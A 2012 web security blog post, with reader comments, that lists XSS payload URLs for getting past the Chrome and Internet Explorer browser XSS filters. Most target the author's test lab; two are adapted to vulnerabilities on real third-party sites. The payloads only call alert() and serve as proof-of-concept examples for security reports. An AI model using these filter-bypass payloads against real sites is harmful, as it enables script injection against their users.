runic.pl
Bezpieczeństwo aplikacji internetowych

Bypassing Chrome/IE XSS filters

[16-08-2012]

Sometimes, when writing a report including XSS vulnerabilities you may want to give examples that work not only in Firefox, but also bypass Chrome/IE browser-side XSS filters. Here are some tricks you may use. They do not really bypass the filters, but are simply not included in their designed scope.

1. Injection inside <script> tag
(Chrome) http://vuln.testlab.runic.pl/xss.php?g=”;alert(document.domain)//
(IE/Chrome) http://vuln.testlab.runic.pl/xss.php?f=)};alert(document.domain);function x() {x(

2. Attribute injection outside of quotes
(Chrome) http://vuln.testlab.runic.pl/xss.php?e=x%20autofocus%20onfocus=alert(document.domain)

3. Multiple injection points
(Chrome) http://vuln.testlab.runic.pl/xss.php?b=*/test=’&a=<script>/*&c=’;alert(document.domain)</script>

4. DOM-based XSS
(IE/Chrome) http://vuln.testlab.runic.pl/xss.php#<img src=x onerror=alert(0)>

5. Same-origin XSS (sounds strange, doesn’t it?) – IE only
(IE) http://vuln.testlab.runic.pl/xss.php?i=?a=<script>alert(document.domain)</script>
(IE) http://vuln.testlab.runic.pl/xss.php?a=<a href=”?a=%26lt;script>alert%26%2340;document.domain)</script>”>click me</a>

6. Use any additional decoding/modification performed by application
(IE) http://vuln.testlab.runic.pl/xss.php?h=%253Cscript%253Ealert(0)%253C/script%253E
- in this case, unnecessary urldecode() was used in the script.

And here are two random XSS vulnerabilities from xssed.com, modified to work in Chrome:
http://www.mercadolivre.com.br/brasil/ml/l_user.main?as_filtro_id=CERTIFIED_USR&as_nickname=*/x=’&as_pcia_id=’;alert(document.domain)%3C/script%3E%22%3E%3Cscript%3E/*
http://www.adobe.com/cfusion/tdrc/modal/signin.cfm?loc=en_us&product=’;alert(document.domain);x=’
(the second one does not execute, but it bypasses Chrome XSS filter anyway)

«
»


Komentarze

  1. carstein | 17 sie 2012 12:33

    Hey,

    You are alive :)
    Couple of months before I was testing Chrome XSS filter and it found that in some rare cases it was also possible to smuggle XSS through incomplete HTML tag – unfortunately it only worked in some real rare cases and it wasn’t real issue.

    c.

  2. lpilorz | 19 sie 2012 19:52

    Thanks, I didn’t know someone still subscribes my RSS ;)

  3. carstein | 21 sie 2012 13:41

    You know what they say – hope dies last. :P

  4. pengsu | 12 wrz 2012 17:50

    Just let you know that the third one, multiple injection points, also works for IE9.

  5. Łukasz Pilorz | 12 wrz 2012 18:18

    Updated the list, thanks a lot!

  6. pengsu | 12 wrz 2012 19:41

    For third one, if I just copy-and-paste to the IE address bar, it won’t work. But it works if I click that Link within IE.

    Any comments on why?

  7. pengsu | 12 wrz 2012 19:47

    checked again. It seems to work only in the same-origin.

  8. lpilorz | 12 wrz 2012 19:52

    Ahh, right, that’s case 5 – now I remember I made the same mistake earlier… :) I’ll update the list again soon. Cheers!

  9. pengsu | 12 wrz 2012 19:56

    Anyway, it’s a great job!



Leave a Comment

Blog